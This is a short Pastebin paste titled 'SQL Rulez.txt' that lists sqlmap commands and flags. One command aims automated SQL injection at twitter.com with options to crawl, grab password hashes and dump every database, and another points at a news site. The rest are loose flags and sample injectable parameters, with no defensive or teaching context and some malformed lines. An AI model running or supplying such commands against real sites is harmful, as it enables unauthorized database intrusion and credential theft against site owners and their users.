Advertisement
skip420

Sql_rulez1

Mar 29th, 2020
313
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.30 KB | None | 0 0
  1. # SQL Rulez.txt
  2.  
  3.  
  4. sqlmap -u https://www.twitter.com -threads=10 --random-agent --crawl=3 --passwords --dump-all --batch
  5.  
  6.  
  7. sqlmap -u http://www.www.africanews.com/80
  8.  
  9. /80
  10. --random-agent
  11. --dbs
  12. --dbs --columns -D scanme
  13.  
  14. id=1&someotherVariable=abc
  15.  
  16. search_get_by_id.php?id=4
  17.  
  18. --dbms=mysql
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement